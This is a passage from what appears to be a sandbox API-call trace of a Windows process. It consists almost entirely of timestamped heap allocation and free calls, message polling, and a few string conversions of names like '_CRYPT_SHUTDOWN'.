lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0144.993] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0144.993] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0144.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0144.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0144.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0144.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0144.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0144.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0144.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa378) returned 0x2e80330 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0144.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0144.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa378) returned 0x2f3ce10 [0144.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0144.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0144.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0144.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0144.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0144.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0144.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0144.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0144.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0144.999] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0144.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0144.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0144.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0144.999] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0144.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0144.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0144.999] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0144.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0144.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0144.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0145.000] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0145.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0145.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0145.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0145.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0145.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0145.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0145.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0145.001] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0145.001] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0145.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0145.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0145.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0145.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0145.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0145.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0145.001] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0145.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0145.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0145.002] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0145.002] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0145.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0145.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0145.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0145.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa378) returned 0x2e80330 [0145.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0145.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0145.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa378) returned 0x2e8a6b0 [0145.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0145.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0145.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0145.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0145.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0145.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0145.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0145.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa378) returned 0x2e80330 [0145.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8a6b0 | out: hHeap=0x970000) returned 1 [0145.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0145.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0145.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa378) returned 0x2e8a6b0 [0145.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f32a90 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0145.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0145.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0145.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28710 | out: hHeap=0x970000) returned 1 [0145.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0145.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0145.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0145.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0145.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3ce10 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0145.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0145.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0145.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0145.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 